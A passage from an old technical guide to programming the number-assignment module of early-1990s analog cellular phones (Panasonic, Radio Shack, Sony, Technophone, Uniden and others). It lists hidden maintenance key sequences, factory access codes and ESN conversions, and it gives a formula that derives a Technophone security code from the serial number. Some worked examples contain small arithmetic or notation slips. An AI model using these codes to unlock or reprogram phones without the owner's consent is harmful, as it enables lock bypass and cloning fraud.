the third letter displays the manufacturer bach. A phone with label ACX was manufactured in March 1991 Programming Sequence: Install fully charged battery and programing adaptor if necessary. Power On Pre 3/91 Models: Enter Maintenance Mode: * + 0 + 0 + 0 + 0 + # Post 3/91 Models: Enter Maintenance Mode: * + 0 + # + 0 + * + 0 # of Digits System ID: 5 XXXXX Mobile Number Number: 10 XXX-XXX-XXXX Preferred System: 1 0(B) or 1(A) Initial Page Channel: 3 333 or 334 Access Overload: 2 XX Group ID: 2 XX Digit Dial Limt: 2 00=32 digits Station Class: 2 XX Speed Dial Number: 12 XXXXXXXXXXXX Lock Code: 2-4 XX, XXX or XXXX Options (FCN 1)(1): 8 11001000 Options (FCN 2)(2): 8 00010100 Options (FCN 3)(3): 8 11110111 Step 11: Local MIN Not Not Ringer Not Not Not Use Opt Used Used Silence Used Used Used Step 12: Not Built-in Auto Full Not A/B Pref Home Used Monitor Lock Lock Used Select Only Only Step 13: (0=65 milliseconds, 1=Continous) Call-in DTMF Send Dial Not Cumulative Resettable Indiv Absence Interval Lock Lock Used Timer Timer Timer % Conversion of EB-3510 serial number to ESN % [For serial numbers 1,000,000 to 1,999,999] (Stamped Serial Number) - (1,000,000) + (262,144) = ESN without prefix Example: Serial Number is 1,234,567 (1,234,567) = (1,000,000) + (262,144) = (496,711) This phone's ESN is 13600496711 % For serial numbers 2,000,000 to 2,999,999 % (Stamped Serial Number) - (2,000,000) + (524,288) = ESN without prefix % For serial numbers 3,000,000 to 3,999,999 % (Stamped Serial Number) - (3,000,000) + (786,432) = ESN without prefix Display ESN: Insert Program Adaptor (PRE 3/91 Phones only) Enter Maintenance Mode: * + 0 + 0 + 0 + 0 + # or * + 0 + # + 0 + * + 0 + # ( if phone was manufacturerd after 3/91) Press * + 3 + SND Press 1 + 1 + SND ESN will display in decimal. Since the display shows 10 digits maximum, first digit of the prefix (136) is hidden. Press CHK to see the missing "1" New Unlock Code: NAM Multiple NAM Select: F + 8 System Select: F + 7 + X X=1 Standard (AB or BA) X=2 A Only X=3 B Only X=4 Home ------------------------------------------------------------------------------- PANASONIC 6106, 6110, EB311 AND EB362 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: PANASONIC Programmer: Handset with PANASONIC programming adaptor ESN Prefix DEC: 136 HEX: 88 ESN, S/N Match Required: Yes, 6106 - No, 6110 (requires conversion) Handset Programmable: Yes, provided programming adaptor is available Number of Channels: 666 (6106) or 832 (6110) Programming Sequence: Connect programming adaptor to phone and 12 volt power supply Power On Enter the following passwords * + 0 + 0 + 0 + 0 + # (wait for 0) * + 1 + SND ( wait for 1) 5 + 0 + SND (display will Clear) Enter individual data then press STO and the correct 2 digit location (i.e. 01, 02, etc) Write NAM information with STO + * + * Steps # of Digits 01 System ID: 4 XXXX 02 Mobile Number: 10 XXX-XXX-XXXX 03 Lock code: 3-4 XXX or XXXX 04 Frequently Dialed #: 10 XXX-XXX-XXXX 05 Station Class: 2 XX 06 Initial Paging Channel: 3 XXX 07 Access Overload: 2 XX 08 Group ID: 2 XX 09 Options(1): 8 11X11100 10 Options(2): 8 00000100 11 Options(3): 8 11000011 % Manufacturer Options % Step 9: Local MIN Preferred EE Rep Use Opt System Sig Opt Horn N/A N/A 1 1 0(B)-1(A) 1 1 1 0 0 Step 10: Built-in Auto A/B Pref Sys Home N/A Monitor Lock N/A N/A Sel. Only Only 0 0 0 0 0 1 0 0 Step 11: (0=65 milliseconds, 1=Continuous) Call In DTMF Total Call Ind Call Absense Interval N/A N/A N/A N/A Timer Timer 1 1 0 0 0 0 1 1 % Conversion of 6110 serial number to ESN % [For serial numbers 1,000,000 to 1,999,999] (Stamped Serial Number) - (1,000,000) + (262,144) = ESN without prefix Example: Serial Number is 1,234,567 (1,234,567) = (1,000,000) + (262,144) = (496,711) This phone's ESN is 13600496711 % For serial numbers 2,000,000 to 2,999,999 % (Stamped Serial Number) - (2,000,000) + (524,288) = ESN without prefix % For serial numbers 3,000,000 to 3,999,999 % (Stamped Serial Number) - (3,000,000) + (786,432) = ESN without prefix Horn Alert: F + 4 + 4 New Unlock Code: NAM System Select: F + X X=7 Home X=8 B Only X=9 A Only X=# BA or AB ------------------------------------------------------------------------------- PANASONIC 6104EA & 6104EC ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: PANASONIC Programmer: Motorola 1801 - Celnum or Curtis ESN Prefex DEC: 136 HEX: 88 ESN, S/N Match Required: Yes Programmable Handset: No Available Channels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX MIN Option: Enabled Repertory Option: Enabled Handsfree Option: Disabled (Enable if equiped) Local Use Option: Enabled End-to-End Signalling: Enabled Horn Alert Option: Enabled System ID Format: XXXXX Preferred System: A or B Access Overload Class: XX Group ID Format: XX Initial Paging Channel: 333 or 334 Station Class: 00 Horn Alert Code: END + # (simultaneously) New Unlock Code: NAM System Select: N/A ------------------------------------------------------------------------------- PANASONIC 6104EB ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: PANASONIC Programmer: Motorola 1801 - Celnum or Curtis ESN Prefix DEC: 136 HEX: 88 ESN, S/N Match Required: Yes Programmable Handset: No Available Channels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX MIN Option: Enabled Repertory Option: Enabled Handsfree Option: Disabled Local Use Option: Enabled End-to-End Signalling: Enabled Horn Alert Option: Enabled System ID Format: XXXXX Preferred System: A or B Access Overload Class: XX Group ID Format: XX Initial Paging Channel: 333 or 334 Station Class: 00 Hex Address B7 B0 13 0 0 0 1 0 0 0 0 14 0 1 0 0 0 0 1 1 Hex Address 13 - B4 A/B Select Hex Address 14 - B6 DTMF Interval B1 Total Call Timer B0 Individual Call Timer Horn Alert: END + # (Simultaneously) New Unlock Code: NAM System Select: F + X X=7 Standard AB or BA X=8 Preferred Only (A or B) X=9 Non-Preferred Only (B or A) ------------------------------------------------------------------------------- PANASONIC 6105EA, 6105EB & 6105EX (100, 101, 102, 103, 104, 105) ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: PANASONIC Programmer: Motorola 1801 - Celnum or Curtis ESN Prefix DEC: 136 HEX: 88 ESN, S/N Match Required: Yes Programmable Handset: No Available Channels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX MIN Option: Enabled Reportory Option: Enabled Handsfree Option: Disabled Local Use Option: Enabled End-to-End Signalling: Enabled Horn Alert Option: Enabled System ID Format: XXXXX Preferred System: A or B Access Overload Class: XX Group ID Format: XX Initial Paging Channel: 333 or 334 Station Class: 00 Hex Address B7 B0 13 0 0 0 1 1 0 0 0 14 1 1 0 0 0 0 1 1 15 1 0 0 0 0 0 0 0 Hex Address 13 - B4 A/B System Selection B3 16 digit display Hex Address 14 - B7 Received Call Indicator B6 DTMF Interval B1 Total Call Timer B0 Individual Call Timer Hex Address 15 - B7 Last Digit Clear Horn Alert: END + # (Simultaneously) New Unlock Code: NAM System Select: STO + # + X X=1 Standard AB or BA X=2 Preferred Only (A or B) X=3 Non-Preferred Only (B or A) ------------------------------------------------------------------------------- PHILIPS FM 9210 Transportable ------------------------------------------------------------------------------- Requires Curtis or Bytek Programmer with Philips adaptor. ------------------------------------------------------------------------------- PIONEER PCM 300 & 500 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Motorola Programmer: Keypad ESN Prefix DEC: 130 HEX: 82 ESN, S/N Match Required: No Stamped Model No.: PCM 300 or PCM 500 Available Channels: 832 Program Sequence: See MOTOROLA Handset Programming -Use Programming Sequence #6 Horn Alert: N/A New Unlock Code: FCN + 0 + 6 digit Security Code + new 3 digit Unlock Code System Select: RCL + * + * + * (to scroll choices) RCL (to store selection) AB BA Home A Only B Only ------------------------------------------------------------------------------- PIONEER PCM 600 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Motorola Programmer: Keypad ESN Prefix DEC: 130 HEX: 82 ESN, S/N Match Required: No Stamped Model No.: PCM 600 Number of Channels: 832 Programming Sequence: See MOTOROLA Handset Programming -Use program Sequence #6 New Unlock Code: FCN + 0 + 6 digit Security Code + new 3 digit Unlock Code System Select: RCL + * + * + * (to scroll choices) STO (to enter selection) AB BA A Only B Only Home ------------------------------------------------------------------------------- PRESTIGE ------------------------------------------------------------------------------- PRESTIGE PR 100, See AUDIOVOX PT 300 PRESTIGE PRT 200, See AUDIOVOX CTR 1900 PRESTIGE PRT 250, See AUDIOVOX MVX 500 ------------------------------------------------------------------------------- PUSLAR ------------------------------------------------------------------------------- See MOTOROLA Handset Programming Instructions ------------------------------------------------------------------------------- RADIO SHACK CROSS REFERENCE ------------------------------------------------------------------------------- Radio Shack, or Tandy, products generally have to model numbers. The first is a stamped model number, and the second is the catalog number. This list will help identify the Radio Shack phones you mat encounter. Stamped Model Marketed Model ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 17-1002 17-1002 Transportable 17-1003 CT200 Transportable 17-1005 CT201 Transportable 17-1006 CT1033 Transportable (See NOKIA-MOBIRA LX-11) 17-1050 CT301 Portable 17-1051 CT302 Portable (See NOKIA-MOBIRA P4000 & PT612) 17-1075 CT101 Mobile 17-1076 CT102 (See NOKIA-MOBIRA LX-11) 17-2001 CT300 Portable 17-3001 CT100 Mobile 17-8003 Canadian Product TC1000 ENTREPRENUER (See Radio Shack CT300 & CT301) ------------------------------------------------------------------------------- RADIO SHACK CT102 ------------------------------------------------------------------------------- See NOKIA MOBIRA LX-11 ------------------------------------------------------------------------------- RADIO SHACK CT1033 Transportable (17-1006) ------------------------------------------------------------------------------- See NOKIA MOBIR LX-11 (Requires Curtis Programmer with MOBIRA adaptor or MOBIRA serive handset) ------------------------------------------------------------------------------- RADIO SHACK CT302 Portable (17-1051) ------------------------------------------------------------------------------- See NOKIA MOBIRA P4000 and PT612 Portable ------------------------------------------------------------------------------- RADIO SHACK CT100 & CT101 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: NOKIA-MOBIRA Programmer: Phone Handset or Service Handset ESN Prefix DEC: 165 HEX: A5 ESN, S/N Match Required: Yes, provided current unlock code is known. Otherwise service handset is necessary Number of Channels: CT100 - 666 Channels CT101 - 832 Channels Programming Sequence: Power On Enter Programming mode: *17*3001*XXXX* where XXXX=1234 (new phones) else XXXX=current unlock code SEL button to increment steps Once last item is entered then phone is returned to normal operation. # of Digits System ID: 5 XXXXX MIN Option: 1 1 Local Use: 1 1 Phone Number: 10 XXX-XXX-XXXX Station Class: 2 XX Initial Paging Channel: 3 333 or 334 Access Overload: 2 XX Group ID: 2 XX Lock Code: 4 XXXX ------------------------------------------------------------------------------- RADIO SHACK CT300 & CT301 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: NOKIA-MOBIRA Programmer: keypad or service adaptor ESN Prefix DEC: 165 HEX: A5 ESN, S/N Match Required: Yes Handset Programmable: Yes, provided security code is known, otherwise test adaptor is necessary Number of Channels: 666 (CT300) 832 (CT301) Programming Sequence: Power On Enter access code, * + 17 + * + 2001 + * + XXXXX + * where XXXXX=12345 (from factory) or XXXXX=Current security code. HO-Id should appear in display Press SEL to enter data and increment Phone automatically writes NAM information upon completion of final step. # of Digits System ID: 5 XXXXX + SEL MIN Option: 1 1 + SEL Local Use: 1 1 + SEL Mobile Number: 10 XXX-XXX-XXXX + SEL Station Class (CT301): 2 10 + SEL Initial Page Channel: 3 333 or 334 + SEL Access Overload: 2 XX + SEL Group ID: 2 XX + SEL Security Code: 5 XXXXX + SEL New Unlock Code: SEL + 7 + 5 digit Security Code (current Unlock code will display) + CLR + new 4 digit Unlock code + END System Select: SEL + 1 + 1 + 1 One of the following prompts will display: A A Only B B Only S AB or BA H Home Press CLR to exit ------------------------------------------------------------------------------- RADIO SHACK CT200 (17-1003) Transportable & CT201 (17-1005) Transportable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: NOKIA-MOBIRA Programmer: Handset, Service Handset or Curtis (with MOBIRA opt) ESN Prefix DEC: 165 HEX: A5 ESN, S/N Match Required: Yes Handset Programmable: Yes Number of Channels: 666 Programming Sequence: Enter Program Mode with the following sequence * + 17 + * + 1003 + * + XXXX + * XXXX=1234 (from factory) XXXX=current security code HO-Id should appear in display Press SEL to enter data and increment Phone automatically writes NAM information upon completion of final step Service Handset Instructions: If using service handset, enter Local Mode with: 01 + # While Noise sounds from handset Enter programming mode with the following sequence: 48 + # Press each step number, desired parameter then * to enter data Example: System ID (0 + XXXXX + *) Once data has been entered, press * to exit Program Mode and return to Local Mode To exit Local Mode, press 02# or Power Off ESN can be read in Local Mode by pressing 44# ESN will display in deciman. Press * to convert ESN to hex # of Digits System ID: 5 XXXXX MIN Option: 1 1 Local Use: 1 1 Mobile Number: 10 XXX-XXX-XXXX Station Class: 2 00 (CT200) or 08(CT201) Initial Page Channel: 3 333 or 334 Access Overload: 2 XX Preferred System: 1 0(B) or 1(A) Group ID: 2 XX Security Code: 4 XXXX Horn Alert: SEL + 2 New Unlock Code: NAM NAM Reading Seq: Enter Local Mode as listed above with serivce handset Press 49# to enter NAM, reading mode. To read programming values, enter step number then press * To exit NAM reading mode, press * and phone will return to Local Mode To exit Local Mode press 02 + # or power OFF System Select: SEL + 1 + 1 + 1 etc (to scroll choices) S=Standard AB or BA A=A only B=B only H=Home ------------------------------------------------------------------------------- RADIO SHACK 17-8003 (Sold in Canada) ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: NOKIA-MOBIRA Programmer: Handset ESN Prefix DEC: 165 HEX: A5 ESN, S/N Match Required: Yes Stamped Model Number: 17-8003 Number Channels: 832 Programming Sequence: Power Off Phone On Power Phone ON while holding # and * simultaneously Hold # and * until lights in top row stay illuminated (ie "Roam" and "No Svc") Enter Code: 57609891 (within 5 seconds) Enter parameter for each step then press STO to increment Once all data has been entered, press SEND to program phgoe and exit Program Mode. # of Digits System ID: 5 XXXXX + STO Local Use: 1 1 + STO Access (Min Opt): 1 1 + STO Mobile Number: 10 XXX-XXX-XXXX + STO Initial Paging Channel: 4 0333 or 0334 Access Overload: 2 XX Preferred system: 1 0(B) or 1(A) Group ID: 2 XX Lock code: 4 XXXX Press SEND to program phone exit. ------------------------------------------------------------------------------- SHINTOM CM-7600 ------------------------------------------------------------------------------- See AUDIOVOX BC-20. Also marked as the following model numbers: A1000 CM50 COLT GT500 LJ750 ST40 XR2000 832XL 4500 ------------------------------------------------------------------------------- SHINTOM 8000 SERIES ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: SHINTOM Programmer: Handset ESN Prefix DEC: 174 HEX: AE ESN, S/N Match Required: Yes Handset Programmable: Yes Number of Channels: 832 Programming Sequence: Power On Press FUNC + 5 to lock phone Enter Program Mode: FUNC + # + 626 + # + FUNC Model Number and Software Version will display Press SEND to advance ESN will display in Hexidecimal Press SEND to advance Each Time SEND is pressed, another programming parameter is displayed The parameter may be changed, press SEND to advance To reach a specific parameter, press END + Address Location + END NAM Information is written with the sequence END + FUNC + END The phone will initialize and be in the Lock Mode. Enter the programmed Unlock Code. # of Digits Area Code: 3 XXX Phone Number: 7 XXX-XXXX System ID: 5 XXXXX Access Overload: 2 XX Group ID: 2 XX Local Use: 1 1 MIN Option: 1 1 Lock Code: 3 XXX (Preset 123) Auto Lock: 1 0(Off) or 1(On) Call Restriction Code: 3 XXX (Preset 123) Call Counter: 2 XX Handsfree: 1 0(Off) or 1(On) Horn Alert: 1 1 Horn Alert Auto Shut off Time: 1 0(2 hours) 1(4 hours) 2(8 hours) 3(no time limit) Cumulative Call: 2 XX (Preset 12) ------------------------------------------------------------------------------- SONY CM-P11 Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: SONY Programmer: Handset ESN Prefix DEC: 154 HEX: 9A ESN, S/N Match Required: Yes Stamped Model Number: CMP11K Number of Channels: 832 Programming Sequence: Install charged portable battery Power On Enter #.+ 5118762 (To program NAM 1) or * + 413897 (To program NAM 2) NAM 1 must be programmed before NAM 2 Once access code is entered, SID will display Enter parameter then press SEND to increment Press END to enter data and exit program mode # of Digits System ID: 5 XXXXX + SEND Mobile Number: 7 XXX-XXXX + SEND Unlock Code: 4 XXXX + SEND Area Code: 3 XXX + SEND Local Use: 1 1 + SEND MIN Option; 1 1 + SEND Station Class: 2 10 + SEND Initial Paging Chan.: 3 333 or 334 + SEND Access Overload: 2 XX + SEND Preferred System: 1 (0=B or 1=A) + SEND Group ID: 2 XX + SEND End-to-End Signaling: 1 1 + SEND Rep Opt: 1 1 + SEND Horn Alert: 1 0 + SEND Handsfree: 1 X + SEND Options(1): 3 XXX (1) Options Redial = 1 Roam Inhibit = 2 Add assigned numbers to enable function (ie, to enable both redial and roam inhibit enter 1+2=3). A second example would be to enable redial and disable roam inhibit you would enter 1 (1+0=1) Display ESN: Power On Enter 07386260 (within 10 seconds) "Selftest No" will display Enter 10+SEND Multiple NAM Select: F + 4 (Simultaneously for 2 seconds) New Unlock Code: NAM System Select: F + 4 + 4 + 4 etc.. (To scroll choices) Standard (AB or BA) A Only B Only Home ------------------------------------------------------------------------------- STANDARD ------------------------------------------------------------------------------- See AT&T 1100 and 1200 ------------------------------------------------------------------------------- STS ------------------------------------------------------------------------------- Not field programmable. Must be returned to factory for programming. For more information call GATEWAY at 314-567-8943 ------------------------------------------------------------------------------- TACTEL ------------------------------------------------------------------------------- See AUDIOVOX CMT1000 ------------------------------------------------------------------------------- TECHNOPHONE PC 105 Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: TECHNOPHONE Programmer: Keypad ESN Prefix DEC: 162 HEX: A2 ESN, S/N Match Required: Yes Number of Channels: 666 Programming Sequence: Power Off Power On (*Key) Enter Access Code: # + XXXXXX + # + # + 953739 + # + UP Key + # + 99 + # + # (XXXXX=Security Code) Power Off (Lock key) Power on (*Key) Phone should show NAM number provided correct code has been entered Enter NAM number (1 to 7) then press * Press Up Key to increment Enter data for each step then press UP Key to step thru NAM Once Initial Page Channel is entered, display will show "System Ident" Enter Alpha designation for city with number keys. Press key repeatedly to step thru letters and press # key to store each letter. Press UP Key, "Save NAM" will display Press SND to write NAM information + END to exit Program Mode # of Digits System ID: 5 XXXXX + UP Key Mobile Number: 10 XXX-XXX-XXXX + UP Key Access Overload: 2 XX + UP Key Group ID: 2 XX + UP Key EX(MIN Opt): 1 1 + UP Key Initial Page Channel: 3 333 or 334 + UP Key (1) Determining Phone's Security Code Subtract last six digits of phone's serial number from 999999 Rearrange the six positions of the remaining number with the following formula: Serial Number: ABCDEF Security Code: FBDEA Position 1(A) Position 5(A) Position 2(B) Position 2(B) Position 3(C) Position 6(C) Position 4(D) Position 3(D) Position 5(E) Position 4(E) Position 6(F) Position 1(F) Example: Stamped Serial Number is 123456 999999 - 123456 ======== 876543 The Security code is 375486 New Unlock Code: MENU + 01 + MENU + 6 digit Security code Unlock Code: (See above formula) + new 4 digit + CLEAR System Select: UP ARROW + LITE (Toggles between AB or BA) ------------------------------------------------------------------------------- TECHNOPHONE PC 115 Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: TECHNOPHONE Programmer: Keypad ESN Prefix DEC: 162 HEX: A2 ESN, S/N Match Required: Yes Number of Channels: 666 Programming Sequence: Power Off Power On (ON/C Key) Enter Access Code: # + XXXXXX + # + # + 953739 + # + MEM Key + # + 99 + MEM Key (XXXXXX=Security Code (1)) Power Off Power On (ON/C Key) Phone should show NAM number provided correct code has been entered Enter NAM Number (1 to 2) then press * Press MEM Key to increment Enter Data for each step then press MEM key to step thru NAM Once Initial Page Channel is entered, display will show "System Ident" Enter Alpha designation for city with number keys. Press key repeatedly to select thru letters, and press # key to store. Press MEM Key, "Save NAM" will display Press SND to write NAM information + END to exit programming mode. # of Digits System ID: 5 XXXXX + MEM Key Mobile Number: 10 XXX-XXX-XXXX + MEM Key Access Overload: 2 XX + MEM Key Group ID: 2 XX + MEM Key EXP (MIN Opt): 1 1 + MEM Key Initial Page Channel: 3 333 or 334 + MEM Key (1) Determining Phone's Security Code - Subtract last six digits of phone's serial number from 999999 Rearrange the six positions of the remaining number with the following formula: Serial Number: ABCDEF Security Code: FBDEA Position 1(A) Position 5(A) Position 2(B) Position 2(B) Position 3(C) Position 6(C) Position 4(D) Position 3(D) Position 5(E) Position 4(E) Position 6(F) Position 1(F) Example: Stamped Serial Number is 123456 999999 - 123456 ======== 876543 The Security code is 375486 System Select: # + 1 + 1 + 1 + * (to toggle) ------------------------------------------------------------------------------- TECHNOPHONE PC 125(M2) Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: TECHNOPHONE Programmer: Keypad ESN Prefix DEC: 162 HEX: A2 ESN, S/N Match Required: Yes Number of Channels: 666 Programming Sequence: Power Off Power On (*Key) Enter Access Code: # + XXXXXX + # + # + 953739 + # + UP Key + STORE + 99 + # + # (XXXXXX=Security Code (1)) Power Off (Lock) Power On (*Key), Phone will ask which NAM provided correct code has been entered. Enter NAM Number (0-7) then press * Press UP Key to increment Enter Data for each step then press UP Key to step thru NAM Once Initial Page Channel is entered, display will show "System Ident" Enter Alpha designation for city with number keys. Press key repeatedly to step thru letters and press # key to store each letter Press UP Key, "Save NAM" will display Press CALL to write NAM information + END to exit Programming Mode # of Digits System ID: 5 XXXXX + UP Key Mobile Number: 10 XXX-XXX-XXXX + UP Key Access Overload: 2 XX + UP Key Group ID: 2 XX + UP Key EXP(MIN Opt): 1 1 + UP Key Initial Page Channel: 3 333 or 334 + UP Key (1) Determining Phone's Security Code - Subtract last six digits of phone's serial number from 999999 Rearrange the six positions of the remaining number with the following formula: Serial Number: ABCDEF Security Code: FBDEA Position 1(A) Position 5(A) Position 2(B) Position 2(B) Position 3(C) Position 6(C) Position 4(D) Position 3(D) Position 5(E) Position 4(E) Position 6(F) Position 1(F) Example: Stamped Serial Number is 123456 999999 - 123456 ======== 876543 The Security code is 375486 System Select: UP ARROW + SYSTEM + UP ARROW (Repeatedly) + SYSTEM (to lock) ------------------------------------------------------------------------------- TECHNOPHONE PC 135 Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: TECHNOPHONE Programmer: Keypad ESN Prefix DEC: 162 HEX: A2 ESN, S/N Match Required: Yes Number of Channels: 832 Programming Sequence: Power Off Power On (*Key) Enter Access Code: # + XXXXXX + # + # + 953739 + # + UP Key + STORE + 99 + # + # (XXXXXX=Security code (1)) Power Off (Lock) Power On(* Key) Phone will ask which NAM provided correct code has been entered Enter NAM number (0-7) then press * Press UP Key to increment Enter Data for each step then press UP Key to step thru NAM Once Initial Page Channel is entered, display will show "System Ident" Enter Alpha designation for city with number keys. Press key repeatedly to step thru letters and press # key to store each letter. Press UP Key, "Save NAM" will display Press SND to write NAME info, + END to exit phone # of Digits System ID: 5 XXXXX + UP Key Mobile Number: 10 XXX-XXX-XXXX + UP Key Access Overload: 2 XX + UP Key Group ID: 2 XX + UP Key EXP (MIN Opt): 1 1 + UP Key Initial Page Channel: 3 333 or 334 + UP Key (1) Determining Phone's Security Code - Subtract last six digits of phone's serial number from 999999 Rearrange the six positions of the remaining number with the following formula: Serial Number: ABCDEF Security Code: FBDEA Position 1(A) Position 5(A) Position 2(B) Position 2(B) Position 3(C) Position 6(C) Position 4(D) Position 3(D) Position 5(E) Position 4(E) Position 6(F) Position 1(F) Example: Stamped Serial Number is 123456 999999 - 123456 ======== 876543 The Security code is 375486 New Unlock Code: MENU + 01 + MENU + 6 digit Security code + 4 digit unlock code + CLEAR System Select: UP ARROW + SYSTEM + UP ARROW + (Repeatedly) + SYSTEM (to lock) ------------------------------------------------------------------------------- TECHNOPHONE PC 205 Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: TECHNOPHONE Programmer: Keypad ESN Prefix DEC: 162 HEX: A2 ESN, S/N Match Required: Yes Stamped Model Number: PC 205A Number of channels: 832 Programming Sequence: Power Off Power On Enter Access Code: # + 000000 + # + # + 953739 + # + MEM + 99 + MEM + MEM Power Off and On again Enter NAM number: F + X; X=1 to 8 Press "F" key to increment Enter data for each step then press "F" key to step thru NAM Once programming is complete, press * + F to enter data # of Digits System ID: 5 XXXXX + F Key Station Class: 2 10 + F Key Mobile Area Code: 3 XXX + F Key Area Code: 3 XXX + F Key (Same as above) Mobile Number: 7 XXX-XXXX + F Key Access Overload: 2 XX + F Key MIN Opt: 1 1 + F Key Initial Page Channel: 3 (333 or 334) + F Key Initial Control Channel: 3 (333 or 334) + F Key Alt System Control Chan: 3 (333 or 334) + F Key Alphanumerically enter City Name: 3 (3 letters max, ie, Mtl=Montreal) International Code: 3 011 + F Key Emergency Number: 3 911 + F Key Operator: 1 0 + F Key Additional NAMS - Enter NAM Number (1-8) or F Key to review program contents Press * + F to enter data New Unlock Code: F + F + F(enter Unlock Code - preset 0000) (Menu C Displays) + F + 3 (current Unlock code displays) + Enter new 4 digit Unlock Code + END System Select: F + 3 + F + F + etc.. (to Scroll choices) + END (to exit) Pref (A only or B only) Non-Pref (B onlt or A only) Home Auto (AB or BA) ------------------------------------------------------------------------------- TECHNOPHONE MC905a, MC905MKII, MC985A and MC9995 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: TECHNOPHONE Programmer: Keypad ESN Prefix DEC: 162 HEX: A2 ESN, S/N Match Required: No (See Display ESN) Stamped Model Number: 905, 985 and 995 on handset Number of Channels: 832 Programming Sequence: Power On Phone should display "Which NAM", if not perform the following Sequence: Press CLR three times (Rapidly) Enter #+000000+#+#+952729+#+STO+99+STO+STO Power Phone OFF then ON again Phone should display "Which NAM" Enter NAM number (1-8) + STO Enter each of the following parameters then press * to store Press SEND to program phone or END to exit without changing existing information # of Digits System ID: 5 XXXXX + * Mobile Number: 10 XXX-XXX-XXXX + * Access Overload: 2 XX + * Group ID: 2 XX + * MIN Opt(EXP): 1 1 + * Initial Page Channel: 3 333(A) or 334(B) + * System ID-Alpha Notation: 3 (System ID) Press SEND to Store information Display ESN: MU + 0 + 1 Horn Alert: Turn Ignition Off+MU+07+MU (to toggle On or Off) Press CLR to exit New Unlock code: MU + 17 + 4 digit unlock code (Preset 0000) + new 4 digit unlock code + MU (Press CLR to exit) System Select: MU + 21 + MU (to toggle) (Toggles between AB and bA) + CLR (to exit) ------------------------------------------------------------------------------- TECHNOPHONE MC915A ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: TECHNOPHONE Programmer: Keypad ESN Prefix DEC: 162 HEX: A2 ESN, S/N Match Required: Yes Number of Channels: 832 Programming Sequence: Power On Phone should display "Which NAM", if not perform the following sequence Press CLR three times (Rapidly) Enter #+000000+#+#+953739+#+STO+29+STO+STO Power Phone Off and On again Phone should display "which NAM" Enter NAM number 1 or 2 + STO then press * to store each parameter Press SEND to program phone or END (to exit without changing existing programming information) # of Digits System ID: 5 XXXXX + * Mobile Number: 10 XXX-XXX-XXXX + * Access Overload: 2 XX + * Group ID: 2 XX + * MIN Opt(EXP): 1 1 + * Initial Page Channel: 3 333(A) or 334(B) + * System ID-Alpha Notation: 3 system ID Press SEND to Store Information Horn Alert: MU + 05 + MU (to toggle On or Off) (Press CLR to exit) New Unlock Code: MU + 08 + 4 digit unlock code (Preset 0000) + new 4 digit unlock code + MU (Press CLR to exit) System Select: MU + 11 + MU (to toggle) (Toggles between AB or BA) ------------------------------------------------------------------------------- UNIDEN CP-900, 1000, 1050, 1100, 1200, 1500, 1900, 2000, 3000, PRESIDENT 4000 GTS and 4500 GTS ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: UNIDEN Programmer: Serivce Handset or Programmer Handset ESN Prefix DEC: 172 HEX: AC ESN, S/N Match Required: Yes Handset Programmable: Service Handset or Programmer Handset Number of Channels: 666 (900, 1000) others 832 Programming Sequence: Connect antenna or load Power Off Disconnect standard handset Connect blue or white service handset White Handset (CP-010): Turn Power Switch On while holding * and # continue holding * and # for two seconds Blue Handset(CP-210): Turn Power Switch On Press SELECT + 2 + SEND Both Handsets: Enter step number, then data for individual parameter Press STO to enter data for each step Increment by pressing next step number To review parameters press: RCL + Step number + STO (to exit) If phone has dual NAM(ie 1050, 1500 & 2000), Press 9 + 5 + SEND (to toggle between NAMs) Press SEND to write NAM information PASS will appear in display if data is valid Step # of Digits 0 System ID: 5 XXXXX + STO 1 Local Use: 1 (0 or 1) + STO 2 MIN Opt: 1 (0 or 1) + STO 3 Mobile Number: 10 XXX-XXX-XXXX + STO 4 Initial Paging Chan: 3 (333 or 334) + STO 5 Access Overload: 2 XX + STO 6 Preferred System: 1 [0 (B) or 1 (A)] + STO 7 Group ID: 2 XX + STO 8 Local Code (1): 4 XXXX + STO 9 F5 DTMF Duration: 2 0-100ms or 1-Continous Press STO to increment to F6 or A All models Except 1500, 1900 and 4500 GTS F6 Automatic Power: 1 0=3 hrs or 1=6 hrs A Handset/Handsfree 1 0(phone auto transfers from switching H/S to H/F) OR 1(call ends when H/S is placed in cradle unless user presses RCL + 6 + 6) Press STO after entering F6 or A data Press SEND to exit program mode Horn Alert: RCL + 9 + 9 + Turn Ignition Off New Unlock Code: NAM System Select: X + STO + 8 + 8 X=1 A only X=2 B only X=3 Home X=4 Standard AB or BA X=5 Inverted BA or AB ------------------------------------------------------------------------------- UNIDEN 5000 and 6000 GTS Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: UNIDEN Programmer: Program or Service Handset with CP 505 Adaptor ESN Prefix DEC: 172 HEX: AC ESN, S/N Match Required: Yes Stamped Model Number: 5000 or 6000 GTS Number of Channels: 832 Programming Sequence: Power Off Remove Battery and install CP505 or CP505A adaptor Connect CP505(A) to power supply or to CP 504 battery eliminator per adaptor instructions Connect Program Handset to CP 505(A) adaptor White Handset (CP-010): Turn Power Switch On while holding * and # continue holding * and # for two seconds Blue Handset(CP-210): Turn Power Switch On 